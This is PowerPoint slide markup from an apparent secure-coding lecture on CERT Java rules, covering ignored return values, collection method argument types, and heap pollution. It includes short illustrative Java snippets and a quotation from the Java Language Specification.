                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s.remove</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(short)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i) == false) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>EXP00-J. Do not ignore values returned by methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>System.err.println</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("Error removing " + i);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    System.out.println(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s.size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>());</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangular Callout 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="5105400"/>
            <a:ext cx="1447800" cy="495701"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -80471"/>
              <a:gd name="adj2" fmla="val 18836"/>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2309" tIns="46154" rIns="92309" bIns="46154" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="292100" algn="l"/>
                <a:tab pos="571500" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="1" charset="-128"/>
              </a:rPr>
              <a:t>Prints 0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6326619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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Secure Coding and SCALe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>SER07-J. Do not use the default serialized form for classes with implementation-defined invariants </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>EXP04-J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. Do not pass arguments to certain Java Collections Framework methods that are a different type than the collection parameter type </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>OBJ03-J. Prevent heap pollution </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>IDS07-J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. Do not pass untrusted, unsanitized data to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Runtime.exec()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1626971686"/>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Collections Framework </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>equals()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The collections framework </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>equals()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> method also takes an argument of type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, but it is acceptable to pass an object of a different type from that of the underlying collection/map to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>equals() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>method. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This should not cause confusion because the contract of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>equals()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> method stipulates that objects of different classes will never be equivalent. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1798889826"/>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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Secure Coding and SCALe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>SER07-J. Do not use the default serialized form for classes with implementation-defined invariants </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>EXP04-J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. Do not pass arguments to certain Java Collections Framework methods that are a different type than the collection parameter type </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OBJ03-J. Prevent heap pollution </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>IDS07-J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. Do not pass untrusted, unsanitized data to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Runtime.exec()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1106516464"/>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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266737" y="227361"/>
            <a:ext cx="8294400" cy="713232"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Heap Pollution</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="コンテンツ プレースホルダ 24"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264855" y="1143101"/>
            <a:ext cx="8439530" cy="5267673"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" i="1" dirty="0" smtClean="0"/>
              <a:t>“It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" i="1" dirty="0"/>
              <a:t>is possible that a variable of a parameterized type will refer to an object that is not of that parameterized type. This situation is known as heap pollution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" i="1" dirty="0" smtClean="0"/>
              <a:t>.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>	Java </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>Language Specification §</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>4.12.2.1.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3852759" y="4902200"/>
            <a:ext cx="1072909" cy="1193800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4919559" y="4902200"/>
            <a:ext cx="1160585" cy="1257300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2633559" y="4902200"/>
            <a:ext cx="1072909" cy="1193800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4995759" y="3683000"/>
            <a:ext cx="1072909" cy="1193800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776559" y="3683000"/>
            <a:ext cx="1072909" cy="1193800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2557359" y="3683000"/>
            <a:ext cx="1072909" cy="1193800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="218340436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Heap Pollution Example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ListUtility</a:t>
            </a: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private static void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addToList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(List list, Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>obj</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>list.add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
